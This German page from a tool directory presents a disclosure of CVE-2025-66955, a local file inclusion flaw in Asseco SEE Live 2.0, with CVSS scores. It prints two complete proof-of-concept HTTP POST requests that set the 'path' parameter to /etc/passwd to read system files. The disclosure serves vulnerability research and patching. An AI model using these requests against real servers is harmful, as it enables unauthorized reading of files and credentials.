Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66955 — Local File Inclusion in den Komponenten Kontaktplan, E-Mail, SMS und Fax in Asseco SEE Live 2.0 ermöglicht es remote authentifizierten Benutzern, über den „path“-Parameter in den API-Aufrufen downloadAttachment und downloadAttachmentFromPath auf Dateien auf dem Host zuzugreifen. | Kitploit
Tools/GitHubGitHub/thewoodenbench/cve-2025-66955
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubthewoodenbench/cve-2025-66955

CVE-2025-66955

Local File Inclusion in den Komponenten Kontaktplan, E-Mail, SMS und Fax in Asseco SEE Live 2.0 ermöglicht es remote authentifizierten Benutzern, über den „path“-Parameter in den API-Aufrufen downloadAttachment und downloadAttachmentFromPath auf Dateien auf dem Host zuzugreifen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 8 MonatenNoch nicht geprüft

CVE-2025-66955

Lokale Dateieinbindung in den Komponenten Kontaktplan, E-Mail, SMS und Fax von Asseco SEE Live 2.0 erlaubt remote authentifizierten Benutzern, auf Dateien auf dem Host zuzugreifen, über den Parameter „path“ in den API-Aufrufen downloadAttachment und downloadAttachmentFromPath.

CVSS-Vektoren

  • CVSS 3.1: 7.7, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CVSS 4.0: 8.4, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N

Angriffsvektoren

Die HTTP-Anfragen erfordern eine niedrige Authentifizierung.

downloadAttachment

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary--

downloadAttachmentFromPath

root@kitploit:~
POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"

Template
------WebKitFormBoundary--

Tool herunterladen